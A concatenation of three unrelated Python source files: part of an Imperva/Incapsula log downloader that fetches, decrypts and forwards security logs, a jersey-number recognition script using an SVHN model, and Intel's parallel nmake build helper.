# keep logs history for 7 days
file_handler = logging.handlers.TimedRotatingFileHandler(os.path.join(log_dir, "logs_downloader.log"), when='midnight', backupCount=7)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
file_handler.setFormatter(formatter)
self.logger.addHandler(file_handler)
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
self.logger.addHandler(console_handler)
if log_level == "DEBUG":
self.logger.setLevel(logging.DEBUG)
elif log_level == "INFO":
self.logger.setLevel(logging.INFO)
elif log_level == "ERROR":
self.logger.setLevel(logging.ERROR)
self.logger.debug("Initializing LogsDownloader")
self.config_path = config_path
self.config_reader = Config(self.config_path, self.logger)
try:
# read the configuration file and load it
self.config = self.config_reader.read()
except Exception:
self.logger.error("Exception while getting LogsDownloader config file - Could Not find Configuration file - %s", traceback.format_exc())
sys.exit("Could Not find Configuration file")
# create a file downloader handler
self.file_downloader = FileDownloader(self.config, self.logger)
# create a last file id handler
self.last_known_downloaded_file_id = LastFileId(self.config_path)
# create a logs file index handler
self.logs_file_index = LogsFileIndex(self.config, self.logger, self.file_downloader)
# create log folder if needed for storing downloaded logs
if self.config.SAVE_LOCALLY == "YES":
if not os.path.exists(self.config.PROCESS_DIR):
os.makedirs(self.config.PROCESS_DIR)
self.logger.info("LogsDownloader initializing is done")
"""
Download the log files.
If this is the first time, we get the logs.index file, scan it, and download all of the files in it.
It this is not the first time, we try to fetch the next log file.
"""
def get_log_files(self):
retries = 0
while self.running:
# check what is the last log file that we downloaded
last_log_id = self.last_known_downloaded_file_id.get_last_log_id()
# if there is no last downloaded file
if last_log_id == "":
self.logger.info("No last downloaded file is found - downloading index file and starting to download all the log files in it")
try:
# download the logs.index file
self.logs_file_index.download()
# scan it and download all of the files in it
self.first_time_scan()
except Exception as e:
self.logger.error("Failed to downloading index file and starting to download all the log files in it - %s, %s", e, traceback.format_exc())
# wait for 30 seconds between each iteration
self.logger.info("Sleeping for 30 seconds before trying to fetch logs again...")
time.sleep(30)
continue
# the is a last downloaded log file id
else:
self.logger.debug("The last known downloaded file is %s", last_log_id)
# get the next log file name that we should download
next_file = self.last_known_downloaded_file_id.get_next_file_name()
self.logger.debug("Will now try to download %s", next_file)
try:
# download and handle the next log file
success = self.handle_file(next_file)
# if we successfully handled the next log file
if success:
self.logger.debug("Successfully handled file %s, updating the last known downloaded file id", next_file)
if self.running:
self.logger.info("Sleeping for 2 seconds before fetching the next logs file")
retries = 0
time.sleep(2)
# set the last handled log file information
self.last_known_downloaded_file_id.move_to_next_file()
# we failed to handle the next log file
else:
self.logger.info("Could not get log file %s. It could be that the log file does not exist yet.", next_file)
if self.running:
if retries >= 10:
self.logger.info("Failed to download file 10 times, trying to recover.")
# download the logs.index file
self.logs_file_index.download()
logs_in_index = self.logs_file_index.indexed_logs()
log_id = self.get_counter_from_file_name(next_file)
first_log_id_in_index = self.get_counter_from_file_name(logs_in_index[0])
if log_id < first_log_id_in_index:
self.logger.error("Current downloaded file is not in the index file any more. This is probably due to a long delay in downloading. Attempting to recover")
self.last_known_downloaded_file_id.remove_last_log_id()
elif self.last_known_downloaded_file_id.get_next_file_name(skip_files=1) in logs_in_index:
self.logger.warning("Skipping " + next_file)
self.last_known_downloaded_file_id.move_to_next_file()
else:
self.logger.info("Next file still does not exist. Sleeping for 30 seconds and continuing normally")
retries = 0
time.sleep(30)
else:
# wait for 30 seconds between each iteration
self.logger.info("Sleeping for 30 seconds before trying to fetch logs again...")
retries += 1
time.sleep(30)
except Exception as e:
self.logger.error("Failed to download file %s. Error is - %s , %s", next_file, e, traceback.format_exc())
"""
Scan the logs.index file, and download all the log files in it
"""
def first_time_scan(self):
self.logger.info("No last index found, will now scan the entire index...")
# get the list of file names from the index file
logs_in_index = self.logs_file_index.indexed_logs()
# for each file
for log_file_name in logs_in_index:
if self.running:
if LogsFileIndex.validate_log_file_format(str(log_file_name.rstrip('\r\n'))):
# download and handle the log file
success = self.handle_file(log_file_name)
# if we successfully handled the log file
if success:
# set the last handled log file information
self.last_known_downloaded_file_id.update_last_log_id(log_file_name)
else:
# skip the file and try to get the next one
self.logger.warning("Skipping File %s", log_file_name)
self.logger.info("Completed fetching all the files from the logs files index file")
"""
Download a log file, decrypt, unzip, and store it
"""
def handle_file(self, logfile, wait_time=5):
# we will try to get the file a max of 3 tries
counter = 0
while counter <= 3:
if self.running:
# download the file
result = self.download_log_file(logfile)
# if we got it
if result[0] == "OK":
try:
# we decrypt the file
decrypted_file = self.decrypt_file(result[1], logfile)
# handle the decrypted content
self.handle_log_decrypted_content(logfile, decrypted_file)
self.logger.info("File %s download and processing completed successfully", logfile)
return True
# if an exception occurs during the decryption or handling the decrypted content,
# we save the raw file to a "fail" folder
except Exception as e:
self.logger.info("Saving file %s locally to the 'fail' folder %s %s", logfile, e, traceback.format_exc())
fail_dir = os.path.join(self.config.PROCESS_DIR, 'fail')
if not os.path.exists(fail_dir):
os.mkdir(fail_dir)
with open(os.path.join(fail_dir, logfile), "w") as file:
file.write(result[1])
self.logger.info("Saved file %s locally to the 'fail' folder", logfile)
break
# if the file is not found (could be that it is not generated yet)
elif result[0] == "NOT_FOUND" or result[0] == "ERROR":
# we increase the retry counter
counter += 1
# if we want to sleep between retries
if wait_time > 0 and counter <= 3:
if self.running:
self.logger.info("Sleeping for %s seconds until next file download retry number %s out of 3", wait_time, counter)
time.sleep(wait_time)
# if the downloader was stopped
else:
return False
# if we didn't succeed to download the file
return False
"""
Saves the decrypted file content to a log file in the filesystem
"""
def handle_log_decrypted_content(self, filename, decrypted_file):
decrypted_file = decrypted_file.decode('utf-8')
if self.config.SYSLOG_ENABLE == 'YES':
syslogger = logging.getLogger("syslog")
syslogger.setLevel(logging.INFO)
if self.config.SYSLOG_PROTO == 'TCP':
self.logger.info('Syslog enabled, using TCP')
syslog = logging.handlers.SysLogHandler(address=(self.config.SYSLOG_ADDRESS, int(self.config.SYSLOG_PORT)), socktype=socket.SOCK_STREAM)
else:
self.logger.info('Syslog enabled, using UDP')
syslog = logging.handlers.SysLogHandler(address=(self.config.SYSLOG_ADDRESS, int(self.config.SYSLOG_PORT)))
### Add by Maytee Sittipornchaisakul
if not self.setOutputSyslogHandler:
syslogger.addHandler(syslog)
self.setOutputSyslogHandler = True
for msg in decrypted_file.splitlines():
if msg != '':
try:
syslogger.info(msg)
except:
self.logger.error('Error sending log file to syslog server %s on port %s via protocol %s', self.config.SYSLOG_ADDRESS, self.config.SYSLOG_PORT, self.config.SYSLOG_PROTO)
if self.config.SAVE_LOCALLY == "YES":
local_file = open(self.config.PROCESS_DIR + filename, "a+")
local_file.writelines(decrypted_file)
"""
Decrypt a file content
"""
def decrypt_file(self, file_content, filename):
# each log file is built from a header section and a content section, the two are divided by a |==| mark
file_split_content = file_content.split(b"|==|\n")
# get the header section content
file_header_content = file_split_content[0].decode('utf-8')
# get the log section content
file_log_content = file_split_content[1]
# if the file is not encrypted - the "key" value in the file header is '-1'
file_encryption_key = file_header_content.find("key:")
if file_encryption_key == -1:
# uncompress the log content
uncompressed_and_decrypted_file_content = zlib.decompressobj().decompress(file_log_content)
# if the file is encrypted
else:
content_encrypted_sym_key = file_header_content.split("key:")[1].splitlines()[0]
# we expect to have a 'keys' folder that will have the stored private keys
self.logger.warning('Keys Dir: %s', os.path.join(self.config_path, "keys"))
if not os.path.exists(os.path.join(self.config_path, "keys")):
self.logger.error("No encryption keys directory was found and file %s is encrypted", filename)
raise Exception("No encryption keys directory was found")
# get the public key id from the log file header
public_key_id = file_header_content.split("publicKeyId:")[1].splitlines()[0]
# get the public key directory in the filesystem - each time we upload a new key this id is incremented
public_key_directory = os.path.join(os.path.join(self.config_path, "keys"), public_key_id)
# if the key directory does not exists
if not os.path.exists(public_key_directory):
self.logger.error("Failed to find a proper certificate for : %s who has the publicKeyId of %s", filename, public_key_id)
raise Exception("Failed to find a proper certificate")
# get the checksum
checksum = file_header_content.split("checksum:")[1].splitlines()[0]
# get the private key
private_key = bytes(open(os.path.join(public_key_directory, "Private.key"), "r").read(), 'utf-8')
try:
rsa_private_key = M2Crypto.RSA.load_key_string(private_key)
content_decrypted_sym_key = rsa_private_key.private_decrypt(base64.b64decode(bytes(content_encrypted_sym_key, 'utf-8')), M2Crypto.RSA.pkcs1_padding)
uncompressed_and_decrypted_file_content = zlib.decompressobj().decompress(AES.new(base64.b64decode(bytearray(content_decrypted_sym_key)), AES.MODE_CBC, 16 * "\x00").decrypt(file_log_content))
# we check the content validity by checking the checksum
content_is_valid = self.validate_checksum(checksum, uncompressed_and_decrypted_file_content)
if not content_is_valid:
self.logger.error("Checksum verification failed for file %s", filename)
raise Exception("Checksum verification failed")
except Exception as e:
self.logger.error("Error while trying to decrypt the file %s: %s", filename, e)
raise Exception("Error while trying to decrypt the file" + filename)
return uncompressed_and_decrypted_file_content
"""
Downloads a log file
"""
def download_log_file(self, filename):
# get the file name
filename = str(filename.rstrip("\r\n"))
try:
# download the file
file_content = self.file_downloader.request_file_content(self.config.BASE_URL + filename)
# if we received a valid file content
if file_content != "":
return "OK", file_content
# if the file was not found
else:
return "NOT_FOUND", file_content
except Exception:
self.logger.error("Error while trying to download file")
return "ERROR"
"""
Validates a checksum
"""
@staticmethod
def validate_checksum(checksum, uncompressed_and_decrypted_file_content):
m = hashlib.md5()
m.update(uncompressed_and_decrypted_file_content)
if m.hexdigest() == checksum:
return True
else:
return False
"""
Handle a case of process termination
"""
def set_signal_handling(self, sig, frame):
if sig == signal.SIGTERM:
self.running = False
self.logger.info("Got a termination signal, will now shutdown and exit gracefully")
"""
Gets the next log file name that we should download
"""
def get_counter_from_file_name(self, file_name):
curr_log_file_name_arr = file_name.split("_")
return int(curr_log_file_name_arr[1].rstrip(".log"))
"""
****************************************************************
Helper Classes
****************************************************************
"""
"""
LastFileId - A class for managing the last known successfully downloaded log file
"""
class LastFileId:
def __init__(self, config_path):
self.config_path = config_path
"""
Gets the last known successfully downloaded log file id
"""
def get_last_log_id(self):
# gets the LastKnownDownloadedFileId file
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
# if the file exists - get the log file id from it
if os.path.exists(index_file_path):
with open(index_file_path, "r+") as index_file:
return index_file.read()
# return an empty string if no file exists
return ''
"""
Update the last known successfully downloaded log file id
"""
def update_last_log_id(self, last_id):
# gets the LastKnownDownloadedFileId file
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
with open(index_file_path, "w") as index_file:
# update the id
index_file.write(last_id)
index_file.close()
"""
Remove the LastKnownDownloadedFileId.txt file. Used to skip missing files.
"""
def remove_last_log_id(self):
index_file_path = os.path.join(self.config_path, "LastKnownDownloadedFileId.txt")
if os.path.exists(index_file_path):
os.remove(index_file_path)
"""
Gets the next log file name that we should download
"""
def get_next_file_name(self, skip_files=0):
# get the current stored last known successfully downloaded log file
curr_log_file_name_arr = self.get_last_log_id().split("_")
# get the current id
curr_log_file_id = int(curr_log_file_name_arr[1].rstrip(".log")) + 1 + skip_files
# build the next log file name
new_log_file_id = curr_log_file_name_arr[0] + "_" + str(curr_log_file_id) + ".log"
return new_log_file_id
"""
Increment the last known successfully downloaded log file id
"""
def move_to_next_file(self):
self.update_last_log_id(self.get_next_file_name())
"""
LogsFileIndex - A class for managing the logs files index file
"""
class LogsFileIndex:
def __init__(self, config, logger, downloader):
self.config = config
self.content = None
self.hash_content = None
self.logger = logger
self.file_downloader = downloader
"""
Gets the indexed log files
"""
def indexed_logs(self):
return self.content
"""
Downloads a logs file index file
"""
def download(self):
self.logger.info("Downloading logs index file...")
# try to get the logs.index file
file_content = self.file_downloader.request_file_content(self.config.BASE_URL + "logs.index")
# if we got the file content
if file_content != "":
content = file_content.decode("utf-8")
# validate the file format
if LogsFileIndex.validate_logs_index_file_format(content):
self.content = content.splitlines()
self.hash_content = set(self.content)
else:
self.logger.error("log.index, Pattern Validation Failed")
raise Exception
else:
raise Exception('Index file does not yet exist, please allow time for files to be generated.')
"""
Validates that format name of the logs files inside the logs index file
"""
@staticmethod
def validate_logs_index_file_format(content):
file_rex = re.compile("(\d+_\d+\.log\n)+")
if file_rex.match(content):
return True
return False
"""
Validates a log file name format
"""
@staticmethod
def validate_log_file_format(content):
file_rex = re.compile("(\d+_\d+\.log)")
if file_rex.match(content):
return True
return False
"""
Config - A class for reading the configuration file
"""
class Config:
def __init__(self, config_path, logger):
self.config_path = config_path
self.logger = logger
"""
Reads the configuration file
"""
def read(self):
config_file = os.path.join(self.config_path, "Settings.Config")
if os.path.exists(config_file):
config_parser = configparser.ConfigParser()
config_parser.read(config_file)
config = Config(self.config_path, self.logger)
# Check for environment variables first, then load config values. Backwards compatibility with non-docker deployments
config.API_ID = os.environ.get('IMPERVA_API_ID', config_parser.get("SETTINGS", "APIID"))
config.API_KEY = os.environ.get('IMPERVA_API_KEY', config_parser.get("SETTINGS", "APIKEY"))
config.PROCESS_DIR = os.environ.get('IMPERVA_LOG_DIRECTORY', os.path.join(config_parser.get("SETTINGS", "PROCESS_DIR"), ""))
config.BASE_URL = os.environ.get('IMPERVA_API_URL', os.path.join(config_parser.get("SETTINGS", "BASEURL"), ""))
config.SAVE_LOCALLY = os.environ.get('IMPERVA_SAVE_LOCALLY', config_parser.get("SETTINGS", "SAVE_LOCALLY"))
config.USE_PROXY = os.environ.get('IMPERVA_USE_PROXY', config_parser.get("SETTINGS", "USEPROXY"))
config.PROXY_SERVER = os.environ.get('IMPERVA_PROXY_SERVER', config_parser.get("SETTINGS", "PROXYSERVER"))
config.SYSLOG_ENABLE = os.environ.get('IMPERVA_SYSLOG_ENABLE', config_parser.get('SETTINGS', 'SYSLOG_ENABLE'))
config.SYSLOG_ADDRESS = os.environ.get('IMPERVA_SYSLOG_ADDRESS', config_parser.get('SETTINGS', 'SYSLOG_ADDRESS'))
config.SYSLOG_PORT = os.environ.get('IMPERVA_SYSLOG_PORT', config_parser.get('SETTINGS', 'SYSLOG_PORT'))
config.SYSLOG_PROTO = os.environ.get('IMPERVA_SYSLOG_PROTO', config_parser.get('SETTINGS','SYSLOG_PROTO'))
config.USE_CUSTOM_CA_FILE = os.environ.get('IMPERVA_USE_CUSTOM_CA_FILE', config_parser.get('SETTINGS', 'USE_CUSTOM_CA_FILE'))
config.CUSTOM_CA_FILE = os.environ.get('IMPERVA_CUSTOM_CA_FILE', config_parser.get('SETTINGS', 'CUSTOM_CA_FILE'))
return config
else:
self.logger.error("Could Not find configuration file %s", config_file)
raise Exception("Could Not find configuration file")
"""
FileDownloader - A class for downloading files
"""
class FileDownloader:
def __init__(self, config, logger):
self.config = config
self.logger = logger
"""
A method for getting a destination URL file content
"""
def request_file_content(self, url, timeout=20):
# default value
response_content = ""
#https://github.com/imperva/incapsula-logs-downloader/pull/7
if self.config.USE_PROXY == "YES" and self.config.USE_CUSTOM_CA_FILE == "YES":
self.logger.info("Using proxy %s" % self.config.PROXY_SERVER)
https = urllib3.ProxyManager(self.config.PROXY_SERVER, ca_certs=self.config.CUSTOM_CA_FILE, cert_reqs='CERT_REQUIRED', timeout=timeout)
elif self.config.USE_PROXY == "YES" and self.config.USE_CUSTOM_CA_FILE == "NO":
self.logger.info("Using proxy %s" % self.config.PROXY_SERVER)
https = urllib3.ProxyManager(self.config.PROXY_SERVER, cert_reqs='CERT_REQUIRED', timeout=timeout)
elif self.config.USE_PROXY == "NO" and self.config.USE_CUSTOM_CA_FILE == "YES":
https = urllib3.PoolManager(ca_certs=self.config.CUSTOM_CA_FILE, cert_reqs='CERT_REQUIRED', timeout=timeout)
else: # no proxy and no custom CA file
https = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', timeout=timeout)
try:
#Download the file
auth_header = urllib3.make_headers(basic_auth='%s:%s' % (self.config.API_ID, self.config.API_KEY))
response = https.request('GET', url, headers=auth_header)
# if we get a 200 OK response
if response.status == 200:
self.logger.info("Successfully downloaded file from URL %s" % url)
# read the response content
response_content = response.data
# if we get another response code
elif response.status == 404:
self.logger.warning("Could not find file %s. Response code is %s", url, response.status)
return response_content
elif response.status == 401:
self.logger.error("Authorization error - Failed to download file %s. Response code is %s", url, response.status)
raise Exception("Authorization error")
elif response.status == 429:
self.logger.error("Rate limit exceeded - Failed to download file %s. Response code is %s", url, response.status)
raise Exception("Rate limit error")
else:
self.logger.error("Failed to download file %s. Response code is %s. Data is %s", url, response.status, response.data)
# close the response
response.close()
# return the content string
return response_content
except urllib3.exceptions.HTTPError as e:
print('Request failed:', e)
self.logger.error("An error has occur while making a open connection to %s. %s", url, str(e.reason))
raise Exception("Connection error")
# unexpected exception occurred
except Exception:
self.logger.error("An error has occur while making a open connection to %s. %s", url, traceback.format_exc())
raise Exception("Connection error")
if __name__ == "__main__":
# default paths
path_to_config_folder = "/etc/incapsula/logs/config"
path_to_system_logs_folder = "/var/log/incapsula/logsDownloader/"
# default log level
system_logs_level = "INFO"
# read arguments
try:
opts, args = getopt.getopt(sys.argv[1:], 'c:l:v:h', ['configpath=', 'logpath=', 'loglevel=', 'help'])
except getopt.GetoptError:
print("Error starting Logs Downloader. The following arguments should be provided:" \
" \n '-c' - path to the config folder" \
" \n '-l' - path to the system logs folder" \
" \n '-v' - LogsDownloader system logs level" \
" \n Or no arguments at all in order to use default paths")
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
print('LogsDownloader.py -c <path_to_config_folder> -l <path_to_system_logs_folder> -v <system_logs_level>')
sys.exit(2)
elif opt in ('-c', '--configpath'):
path_to_config_folder = arg
elif opt in ('-l', '--logpath'):
path_to_system_logs_folder = arg
elif opt in ('-v', '--loglevel'):
system_logs_level = arg.upper()
if system_logs_level not in ["DEBUG", "INFO", "ERROR"]:
sys.exit("Provided system logs level is not supported. Supported levels are DEBUG, INFO and ERROR")
# init the LogsDownloader
logsDownloader = LogsDownloader(path_to_config_folder, path_to_system_logs_folder, system_logs_level)
# set a handler for process termination
signal.signal(signal.SIGTERM, logsDownloader.set_signal_handling)
try:
# start a dedicated thread that will run the LogsDownloader logs fetching logic
process_thread = threading.Thread(target=logsDownloader.get_log_files, name="process_thread")
# start the thread
process_thread.start()
while logsDownloader.running:
time.sleep(1)
process_thread.join(1)
except Exception:
sys.exit("Error starting Logs Downloader - %s" % traceback.format_exc())
|
Number_Detect.py
|
# -*- coding: utf-8 -*-
# @Time : 2021/1/29 17:22
# @Author : BINGO
# @School: 浙江大学
# @Campany: 竺星
# @FileName: Number_Detect.py
import threading, queue, time
from queue import Queue
from threading import Thread, currentThread
import os
from CalibrateTransfer.img_operation import ScreenSHot_batch
from CalibrateTransfer.data_preprocess import write_data_to_json_file, read_data_from_json_file_v2
import numpy as np
import torch.utils.data as data
import torch
import json
import shutil
from ReID_model.modeling import ReID_Model
from utils_BINGO.K_Means import k_means
from ReID_model.utils.dataset_loader import ReID_imgs_load_by_home_and_away
import logging
from utils.log import Log
from utils.timer import Timer
from utils.dir_related_operation import makedir_v1
import cv2
from SVHN.svhn import load_in_Svhn_model
from torchvision import transforms
from PIL import Image
from utils_BINGO.Number_Rectifier import Number_Rectifier
class SVHN_Predict():
def __init__(self,dir_root, ReIDCfg, Num_Pred_opt, vis, queueSize=1024):
self.dir_root = dir_root
self.dir_list = [d for d in os.listdir(self.dir_root) if os.path.isdir(os.path.join(self.dir_root, d))]
self.dir_list = sorted(self.dir_list, key=lambda x: int(x))
# logger.info('目标文件夹是{}'.format(self.root_path))
self.datalen = len(self.dir_list)
self.Start_Index = 0
if vis:
self.vis_path = vis
# 号码纠正器, 根据四官报告来修改参数
self.Number_Rectifier = Number_Rectifier
self.batch_size = 60
self.Num_Pred_opt = Num_Pred_opt # 用来设置号码识别模型的参数。
self.SVHN_predictor = load_in_Svhn_model(self.Num_Pred_opt)
self.PreProcess_Q = Queue(maxsize=queueSize) # 在号码识别前,对输入图片进行预处理。
self.SVHN_Q = Queue(maxsize=queueSize)
self.transform = transforms.Compose([
transforms.Resize([54, 54]),
transforms.ToTensor(),
transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])
])
self.height_threshold = 21
self.width_threshold = 12
# 加载 ReID 模型
self.ReIDCfg = ReIDCfg
self.num_cls = 4 # 场上有几种类型的人
self.logger = Log(__name__, 'SVHN_Predict').getlog()
def PreProcess_(self):
self.t_PreProcess = Thread(target=self.PreProcess, args=())
self.t_PreProcess.daemon = True
self.t_PreProcess.start()
def PreProcess(self):
'''
对需要号码识别的图片进行预处理。
'''
self.logger.debug('The pid of SVHN_Predict.PreProcess() : {}'.format(os.getpid()))
self.logger.debug('The thread of SVHN_Predict.PreProcess() : {}'.format(currentThread()))
PreProcess_timer = Timer()
for dir_index in range(self.Start_Index, self.datalen):
PreProcess_timer.tic() # 开始计时
# self.logger.debug('PreProcess() ======================================== action {}'.format(dir_index))
this_dir = os.path.join(self.dir_root,self.dir_list[dir_index],'Target')
imgs_name_list= os.listdir(this_dir)
if len(imgs_name_list) <= 0:
self.PreProcess_Q.put((False, (dir_index, [])))
print('{} is empty'.format(this_dir))
continue
imgs_transfered_list = []
original_imgs = []
for img_name in imgs_name_list:
this_img_path = os.path.join(this_dir,img_name)
this_img = cv2.imread(this_img_path)
if this_img.size == 0:
print('dir_index : {}, img_name : {} is empty'.format(dir_index, img_name) )
continue
height, width, _ = this_img.shape
if height < self.height_threshold or width < self.width_threshold:
# 图片太小了,就不放入骨骼点检测的序列中。
continue
img_transfered = Image.fromarray(this_img)
img_transfered = self.transform(img_transfered)
imgs_transfered_list.append(img_transfered)
original_imgs.append(this_img)
# 如果都不符合条件的话。
if len(original_imgs) == 0:
self.PreProcess_Q.put((False, (dir_index, [])))
else:
imgs_transfered_list = torch.stack(imgs_transfered_list, dim=0)
self.PreProcess_Q.put((True, (dir_index, imgs_transfered_list, original_imgs)))
# self.logger.info('Calibrate_transfer.sub_img_generate() action {} consums {}s'.format(action_index,sub_img_generate_timer.toc()))
# self.logger.log(24, 'SVHN_Predict.PreProcess() action {} consums {}s'.format(dir_index, PreProcess_timer.toc()))
def Predict_(self):
self.t_Predict = Thread(target=self.Predict, args=())
self.t_Predict.daemon = True
self.t_Predict.start()
def Predict(self):
'''
使用 SVHN 对完成预处理的图片进行号码预测
'''
Predict_timer = Timer()
self.logger.debug( 'The pid of SVHN_Predict.Predict() : {}'.format(os.getpid()))
self.logger.debug( 'The thread of SVHN_Predict.Predict() : {}'.format(currentThread()))
Number_TrackingID_dict = {}
for dir_index in range(self.Start_Index, self.datalen):
Predict_timer.tic() # 开始计时
Predict_len = 0
dir_name = self.dir_list[dir_index]
PreProcess_Flag, PreResults = self.PreProcess_Q.get()
# self.logger.debug('Predict() ======================================== action {}'.format(action_index))
if PreProcess_Flag == False:
# 输入的数据无意义
preNum = -1
else:
# 输入的数据有意义, 读取数据
_, rectangle_imgs,original_imgs = PreResults
imgs_length = rectangle_imgs.size(0)
leftover = 0
if (imgs_length) % self.batch_size:
leftover = 1
num_batches = imgs_length // self.batch_size + leftover
if self.vis_path:
vis_dir = os.path.join(self.vis_path,'{}'.format(dir_name),'SVHN_Predict')
makedir_v1(vis_dir)
vis_dir_0 = os.path.join(self.vis_path, '{}'.format(dir_name), 'SVHN_Predict_Minus_one')
makedir_v1(vis_dir_0)
NumsArray = []
for j in range(num_batches):
input_imgs_j = rectangle_imgs[j*self.batch_size:min((j+1)*self.batch_size , imgs_length)]
length_logits_j, digits_logits_j = self.SVHN_predictor(input_imgs_j.cuda())
'''This max function return two column, the first row is value, and the second row is index '''
length_predictions_j = length_logits_j.max(1)[1].cpu().tolist()
digits_predictions_j = [digits_logits_j.max(1)[1].cpu().tolist() for digits_logits_j in digits_logits_j]
NumsArray_j = []
for Num_i in range(len(length_predictions_j)):
Number_len = length_predictions_j[Num_i]
if Number_len == 1:
Num = digits_predictions_j[0][Num_i]
NumsArray_j.append(Num)
elif Number_len == 2:
Num = digits_predictions_j[0][Num_i] * 10 + digits_predictions_j[1][Num_i]
NumsArray_j.append(Num)
elif Number_len == 0:
Num = -1
if self.vis_path:
cv2.imwrite(os.path.join(vis_dir_0, '{}_P{}.jpg'.format(num_batches*j + Num_i, Num)), original_imgs[Num_i])
continue
else:
continue
if self.vis_path:
cv2.imwrite(os.path.join(vis_dir, '{}_P{}.jpg'.format(num_batches*j + Num_i, Num)), original_imgs[Num_i])
NumsArray.extend(NumsArray_j)
Predict_len = len(NumsArray)
if Predict_len > 1:
# NumberArray range from 0 to 99.
# We need to count how many times does each number appear!
NumsArray = np.histogram(NumsArray, bins=100, range=(0, 100))[0]
preNum = np.argmax(NumsArray)
# if preNum == 10:
# print('wrong value')
preNum_count = NumsArray[preNum]
if np.where(NumsArray == preNum_count)[0].size > 1:
# if there are more than one number have the maximun counts, then return -1
# can sort by number classification scores.
preNum = -1
else:
preNum = -1
# 保存数据
# self.logger.log(24, 'SVHN_Predict.Predict action {} consums {}s'.format(action_index, Predict_timer.toc()))
self.logger.log(24,'dir_name {} Predict_len = {} Predict num = {} ============='.format(dir_name, Predict_len, preNum))
Number_TrackingID_dict[int(dir_name)] = int(preNum)
with open(os.path.join(self.vis_path,'Number_results.json'),'w') as f :
json.dump(Number_TrackingID_dict,f)
self.logger.log(24, '-----------------------------Finished SVHN_Predict.Predict() datalen = {}-----------------------------'.format(self.datalen))
if __name__ == '__main__':
from opt import OPT_setting
from Write_Config import readyaml
from easydict import EasyDict as edict
opt = OPT_setting().init()
Num_Pred_opt = edict(readyaml(opt.SvhnCfg))
ReIDCfg = edict(readyaml(opt.ReIDCfg))
dir_root = '/datanew/hwb/data/MOT/WestGroundALL/100-s-1/results_pose/ch01'
vis = '/datanew/hwb/data/MOT/WestGroundALL/100-s-1/Number_vis'
N_Predictor = SVHN_Predict(dir_root, ReIDCfg, Num_Pred_opt, vis)
N_Predictor.PreProcess_()
N_Predictor.Predict_()
# 等待后处理的线程结束
N_Predictor.t_PreProcess.join()
print(24, '----------------Finished N_Predictor.t_PreProcess()----------------')
N_Predictor.t_Predict.join()
print(24, '----------------Finished N_Predictor.t_Predict() datalen = {}----------------'.format(
N_Predictor.datalen))
# os.kill(os.getpid(),signal.SIGKILL)
|
NmakeSubdirs.py
|
# @file NmakeSubdirs.py
# This script support parallel build for nmake in windows environment.
# It supports Python2.x and Python3.x both.
#
# Copyright (c) 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
#
# Import Modules
#
from __future__ import print_function
import argparse
import threading
import time
import os
import subprocess
import multiprocessing
import copy
import sys
__prog__ = 'NmakeSubdirs'
__version__ = '%s Version %s' % (__prog__, '0.10 ')
__copyright__ = 'Copyright (c) 2018, Intel Corporation. All rights reserved.'
__description__ = 'Replace for NmakeSubdirs.bat in windows ,support parallel build for nmake.\n'
cpu_count = multiprocessing.cpu_count()
output_lock = threading.Lock()
def RunCommand(WorkDir=None, *Args, **kwargs):
if WorkDir is None:
WorkDir = os.curdir
if "stderr" not in kwargs:
kwargs["stderr"] = subprocess.STDOUT
if "stdout" not in kwargs:
kwargs["stdout"] = subprocess.PIPE
p = subprocess.Popen(Args, cwd=WorkDir, stderr=kwargs["stderr"], stdout=kwargs["stdout"])
stdout, stderr = p.communicate()
message = ""
if stdout is not None:
message = stdout.decode(errors='ignore') #for compatibility in python 2 and 3
if p.returncode != 0:
raise RuntimeError("Error while execute command \'{0}\' in direcotry {1}\n{2}".format(" ".join(Args), WorkDir, message))
output_lock.acquire(True)
print("execute command \"{0}\" in directory {1}".format(" ".join(Args), WorkDir))
print(message)
output_lock.release()
return p.returncode, stdout
class TaskUnit(object):
def __init__(self, func, args, kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
def __eq__(self, other):
return id(self).__eq__(id(other))
def run(self):
return self.func(*self.args, **self.kwargs)
def __str__(self):
para = list(self.args)
para.extend("{0}={1}".format(k, v)for k, v in self.kwargs.items())
return "{0}({1})".format(self.func.__name__, ",".join(para))
class ThreadControl(object):
def __init__(self, maxthread):
self._processNum = maxthread
self.pending = []
self.running = []
self.pendingLock = threading.Lock()
self.runningLock = threading.Lock()
self.error = False
self.errorLock = threading.Lock()
self.errorMsg = "errorMsg"
def addTask(self, func, *args, **kwargs):
self.pending.append(TaskUnit(func, args, kwargs))
def waitComplete(self):
self._schedule.join()
def startSchedule(self):
self._schedule = threading.Thread(target=self.Schedule)
self._schedule.start()
def Schedule(self):
for i in range(self._processNum):
task = threading.Thread(target=self.startTask)
task.daemon = False
self.running.append(task)
self.runningLock.acquire(True)
for thread in self.running:
thread.start()
self.runningLock.release()
while len(self.running) > 0:
time.sleep(0.1)
if self.error:
print("subprocess not exit successfully")
print(self.errorMsg)
def startTask(self):
while True:
if self.error:
break
self.pendingLock.acquire(True)
if len(self.pending) == 0:
self.pendingLock.release()
break
task = self.pending.pop(0)
self.pendingLock.release()
try:
task.run()
except RuntimeError as e:
if self.error: break
self.errorLock.acquire(True)
self.error = True
self.errorMsg = str(e)
time.sleep(0.1)
self.errorLock.release()
break
self.runningLock.acquire(True)
self.running.remove(threading.currentThread())
self.runningLock.release()
def Run():
curdir = os.path.abspath(os.curdir)
if len(args.subdirs) == 1:
args.jobs = 1
if args.jobs == 1:
try:
for dir in args.subdirs:
RunCommand(os.path.join(curdir, dir), "nmake", args.target, stdout=sys.stdout, stderr=subprocess.STDOUT)
except RuntimeError:
exit(1)
else:
controller = ThreadControl(args.jobs)
for dir in args.subdirs:
controller.addTask(RunCommand, os.path.join(curdir, dir), "nmake", args.target)
controller.startSchedule()
controller.waitComplete()
if controller.error:
exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog=__prog__, description=__description__ + __copyright__, conflict_handler='resolve')
parser.add_argument("target", help="the target for nmake")
parser.add_argument("subdirs", nargs="+", help="the relative dir path of makefile")
